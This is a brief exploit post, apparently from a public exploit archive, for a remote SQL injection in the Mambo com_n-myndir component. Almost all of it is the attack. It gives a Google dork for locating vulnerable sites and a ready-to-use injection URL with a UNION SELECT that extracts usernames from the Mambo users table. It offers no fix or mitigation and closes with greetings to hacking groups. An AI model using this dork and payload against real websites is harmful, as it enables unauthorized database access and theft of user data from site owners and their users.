The Mambo N-Myndir component suffers from a remote SQL injection vulnerability.
22d935c5b6cfa89d337e51d834cfe8b5e602e6200bc72574cf8812d5dacfa3e2
------------------------------------------------------------------------------------------------------
# Exploit Title: Mambo Component com_n-myndir SQL Injection Vulnerability
# Google Dork: inurl:index.php?option=com_n-myndir
# Date: 01/09/2011
# Author: CoBRa_21 (Penetration Tester)
# E-Mail: ghost1lover@hotmail.com
# Software Link: https://www.netvistun.is/
# Tested on: FreeBSD 6.1 (remote host)
------------------------------------------------------------------------------------------------------
Exploit
https://localhost/[PATH]/index.php?option=com_n-myndir&flokkur=-16 union select username from mos_users
------------------------------------------------------------------------------------------------------
Thanks E-Banka.Org & Cyber-Warrior.Org
------------------------------------------------------------------------------------------------------